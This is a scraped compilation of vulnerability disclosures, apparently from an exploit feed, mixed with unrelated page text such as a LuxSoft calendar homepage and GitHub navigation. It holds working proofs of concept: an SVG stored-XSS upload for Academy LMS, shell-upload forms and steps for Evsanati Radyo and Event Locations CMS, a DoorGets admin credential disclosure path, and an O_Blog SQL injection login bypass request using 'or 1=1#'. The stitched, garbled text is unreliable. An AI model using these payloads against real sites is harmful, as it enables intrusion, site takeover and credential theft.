Academy LMS version 6.1 suffers from an upload vulnerability that could lead to persistent cross site scripting attacks.

    # Exploit Title: Academy LMS 6.1 - Arbitrary File Upload# Exploit Author: CraCkEr# Date: 05/08/2023# Vendor: Creativeitem# Vendor Homepage: https://academylms.net/# Software Link: https://demo.academylms.net/# Tested on: Windows 10 Pro# Impact: Allows User to upload files to the web server# CWE: CWE-79 - CWE-74 - CWE-707## DescriptionAllows Attacker to upload malicious files onto the server, such as Stored XSS## Steps to Reproduce:1. Login as a [Normal User]2. In [User Dashboard], go to [Profile Settings] on this Path: https://website/dashboard/#/settings3. Upload any Image into the [avatar]4. Capture the POST Request with [Burp Proxy Intercept]5. Edit the file extension to .svg & inject your [Evil-Code] or [Stored XSS] -----------------------------------------------------------POST /wp-admin/async-upload.php HTTP/2-----------------------------------------------------------Content-Disposition: form-data; name="async-upload"; filename="ahacka.svg"Content-Type: image/svg+xml<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>  <script type="text/javascript">    alert("XSS by CraCkEr");  </script></svg>-----------------------------------------------------------6. Send the Request7. Capture the GET request from [Burp Logger] to get the Path of your Uploaded [Stored-XSS]8. Access your Uploded Evil file on this Path: https://website/wp-content/uploads/***/**/*****.svg[-] Done

Academy LMS 6.1 Cross Site Scripting / File Upload

Evsanati Radyo version 1.0 suffers from a remote shell upload vulnerability.

====================================================================================================================================  
| # Title     : evsanati radyo v1.0 Remote File Upload Vulnerability                                                               |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            |  
| # Vendor    : https://donanimplus.com/b/evsanati-v1-0-radyo-scripti                                                              |  
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine 

[+] infected file : /upload/yukle.php

[+] Unauthorized administrator access. Allows any visitor to upload malicious files and run them

[+] Some web sites have deleted the upload file so use this code ( note : use after login )

[+] line 5 set your target

<head>  
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />  
</head>

<form action="http://1270.0.0.1/gazipasayalcinemlakcom/upload/yukle.php" method="post" enctype="multipart/form-data">

<div align="center">

<table border="0" cellspacing="0" cellpadding="0">  
  <tr>  
    <td><b>Resmi Secin :</b></td>  
    <td>&nbsp;<input type="file" name="dosya" size="20"></td>  
  </tr>  
  <tr>  
    <td></td>  
    <td><br /><input type="submit" value="Yukle" style="width:220px;"></td>  
  </tr>  
</table>

</div>

</form>

Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |  
=======================================================================================================================================

Evsanati Radyo 1.0 Shell Upload

Event Locations CMS version 1.0.1 suffers from a remote shell upload vulnerability.

    ====================================================================================================================================| # Title     : Event Locations CMS V1.0.1 - unrestricted files upload Vulnerability                                               || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            | | # Vendor    : https://codecanyon.net/item/event-locations-phpmysql-plugin/22100679                                               |  | # Dork      : "/events_edit.php?id="                                                                                             |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Allows any visitor to upload malicious files and run them[+] click 2 creat a Nouveau RDV & in Upload Image box upload your Ev!l .[+] go to http://127.0.0.1/cutgg/assets/uploads/ Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Event Locations CMS 1.0.1 Shell Upload

DoorGets CMS version 7.0 suffers from an information leakage vulnerability.

====================================================================================================================================  
| # Title     : DoorGets CMS v7.0 Sensitive information disclosure Vulnerability                                                   |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               |   
| # Vendor    : https://sourceforge.net/projects/doorgets-cms/files/latest/download?source=directory                               |    
| # Dork      : "Powered with doorGets ™"                                                                                          |  
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] Payload gives you the username and password for the site script manager.

[+] The problem is caused when the installation folder is not deleted by the user .

[+] In this case the developer made a mistake .

    So that after installation, the script does not delete the installation file or notify the user of changing the folder path or deleting it. 

    It also stores the manager's information in temporary files that any visitor can scan and can use this information to the script control panel.

[+] Use Payload : setup/temp/admin.php

[+] it show you login information for admin access .

[+] http://127.0.0.1/watsingschoolacth/v12/setup/temp/admin.php

Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |  
=======================================================================================================================================

DoorGets CMS 7.0 Information Disclosure

SQL injection vulnerability in berkaygediz O_Blog v.1.0 allows a local attacker to escalate privileges via the secure_file_priv component.

SQL injection bypass login:  
POST /O\_Blog-main/ HTTP/1.1  
Host: 192.168.150.131  
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,_/_;q=0.8  
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
DNT: 1  
Cookie: PHPSESSID=9697cab5c5ac6b604b268d245e9a9519  
Connection: close  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 47

eposta=2384693535@qq.com'or 1=1#&sifre=31232132

CVE-2023-38899: sql sql injection · Issue #2 · berkaygediz/O_Blog

Cross-site scripting vulnerability in Advanced Custom Fields versions 6.1.0 to 6.1.7 and Advanced Custom Fields Pro versions 6.1.0 to 6.1.7 allows a remote authenticated attacker to execute an arbitrary script on the web browser of the user who is logging in to the product with the administrative privilege.

CVE-2023-40068: Advanced Custom Fields (ACF)

SQL injection vulnerability in LuxCal Web Calendar prior to 5.2.3M (MySQL version) and LuxCal Web Calendar prior to 5.2.3L (SQLite version) allows a remote unauthenticated attacker to execute arbitrary queries against the database and obtain or alter the information in it.

Yes, you landed on the LuxSoft website.

The LuxSoft website had a facelift to give it a more  
modern look 'n' feel and to make it more responsive.

We hope you will 🧡 it

(click this box to cancel it)

Home

**LuxCal Web Calendar**

LuxCal is a free user-friendly, intuitive web calendar. It can help you to organize and keep track of your events and appointments in an easy way from your phone, tablet or PC at home, in the office, on business trips or when on holiday. LuxCal has all essential functions you may expect from a modern web calendar and is targeted at home use and small businesses.

**Highlights**

*   intuitive, friendly user interface
*   multi-user access with user name / password protection
*   users and user groups with selectable privileges
*   optionally multiple, independent calendars
*   multi-language user interface (see section below)
*   repeating and multi-day events
*   fully tailorable to your needs, e.g. date and time formats, user interface layout, colors, etc.
*   event coloring (text and background) according to event categories
*   email and SMS reminders x days before the event is due
*   event categories and subcategories
*   event filtering on various criteria
*   full text search with wildcards
*   different views, e.g. year, month, week, day, upcoming, changes and more
*   proposing events and approving events (e.g. by manager)
*   importing and exporting of events
*   easy to administer and maintain
*   fully self contained and therefore fast (no links to external software)
*   various possibilities to embed the calendar in a page of your website
*   PHP-powered, with HTML, JavaScript and CSS
*   using an SQLIte or MySQL database (your choice)
*   released under the GNU General Public License
*   actively supported by LuxSoft and . . . . Luxcal is free!

**User Interface Languages**

LuxCal user interface texts are defined in separate language packs. Most LuxCal language packs have been produced by LuxCal users in the countries concerned. The following languages are currently available:

*   Bulgarian
*   Czech
*   Danish
*   German
*   Greek
*   English
*   Spanish
*   Finnish
*   French
*   Hungarian
*   Italian
*   Dutch
*   Norwegian
*   Polish
*   Portuguese
*   Romanian
*   Russian
*   Swedish
*   Slovene
*   Turkish
*   Vietnamese

Each calendar user can choose his/her own language.

**Technical Details**

LuxCal is written in the PHP and JavaScript scripting languages and uses an SQLite or a MySQL database (at your choice) to store its data. So LuxCal runs on a server with one of the latest versions of PHP and - for the MySQL version - MySQL.

LuxCal produces HTML5 code and has been tested with recent versions of             

**Responsibility / Liability**

LuxSoft maintains this calendar to the best of its abilities and will try to correct reported errors and problems whenever possible. However, LuxSoft accepts no responsibility or liability whatsoever with regard to the use of the LuxCal calendar, nor the data stored by the LuxCal calendar.

CVE-2023-39939: LuxSoft Home

A vulnerability was found in SourceCodester Free and Open Source Inventory Management System 1.0. It has been classified as critical. Affected is an unknown function of the file /index.php?page=member. The manipulation of the argument columns[0][data] leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-237570 is the identifier assigned to this vulnerability.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2023-4449: vuls/README.md at main · Jacky-Y/vuls

A vulnerability has been found in OpenRapid RapidCMS 1.3.1 and classified as critical. This vulnerability affects unknown code of the file admin/article-chat.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-237568.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2023-4447: SQL injection vulnerability exists in RapidCMS Dev.1.3.1 · Issue #4 · OpenRapid/rapidcms

A vulnerability was found in OpenRapid RapidCMS 1.3.1 and classified as critical. This issue affects some unknown processing of the file admin/run-movepass.php. The manipulation of the argument password/password2 leads to weak password recovery. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of the patch is 4dff387283060961c362d50105ff8da8ea40bcbe. It is recommended to apply a patch to fix this issue. The identifier VDB-237569 was assigned to this vulnerability.

@@ -1,29 +1,4 @@

<?php

include("../resource/variable.php");

function encode($string = '', $skey = 'cxphp')

{

$strArr = str\_split(base64\_encode($string));

$strCount = count($strArr);

foreach (str\_split($skey) as $key => $value)

$key < $strCount && $strArr\[$key\] .= $value;

return str\_replace(array('=', '+', '/'), array('O0O0O', 'o000o', 'oo00o'), join('', $strArr));

}

  

define('BASE\_PATH', str\_replace('\\\\', '/', realpath(dirname(\_\_FILE\_\_) . '/')) . "/");

define('BASE\_PATH1', str\_replace('\\\\', '/', realpath(dirname(BASE\_PATH) . '/')) . "/");

$json\_string = file\_get\_contents(BASE\_PATH1 . '/install/sql-config/sql.json');

$dataxxx = json\_decode($json\_string, true);

$link = mysqli\_connect($dataxxx\['server'\], $dataxxx\['dbusername'\], $dataxxx\['dbpassword'\], $dataxxx\['dbname'\]);

$sql = "select password from \`rapidcmsadmin\` where username=\\"admin\\"";

$result = mysqli\_query($link, $sql);

$pass = mysqli\_fetch\_row($result);

$pa = $pass\[0\];

  

if ($\_COOKIE\["admin"\] != encode('admin', $pa)) {

  

}else{

Header("Location: index.php");

}

  

?>

  

Expand Down

Tag

#php